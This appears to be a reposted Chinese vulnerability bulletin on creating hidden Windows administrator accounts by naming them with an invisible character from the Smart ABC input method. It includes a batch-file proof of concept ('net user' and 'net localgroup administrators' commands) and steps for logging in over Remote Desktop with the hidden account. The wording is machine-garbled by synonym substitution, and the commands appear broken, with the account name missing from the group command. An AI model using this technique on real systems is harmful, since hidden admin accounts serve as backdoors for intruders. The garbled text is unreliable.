微软全系统成立躲藏账户漏洞及修复[网络技术]

扼要描写:
可以通过特别字符成立躲藏账户.号令行界面下不显示,用户管理面板中显示为空.非$..

具体阐明:
可以通过智能ABC输入法中V9里的空白字符成立躲藏帐号,号令行下无法成立,可以先写个批处理,以下:
net user 123 /add
net localgroup administrators /add
注意此中的空白字符.非空格.
成立后号令行下用net user号令查看账户显示为空白,在用户界面中一样显示空白.
成立此帐号后无法在mstsc中直接输入登陆,需求在远程桌面的选项面板的通例选项卡中的用户名一栏里用智能ABC的V9输入特别字符后再次衔接.

漏洞证明:
新建一个批处理,内容以下.
net user 123 /add
net localgroup administrators /add
履行后查看用户管理界面,看看能否有个空白帐号.

修复筹划:
过滤这些特别字符吧.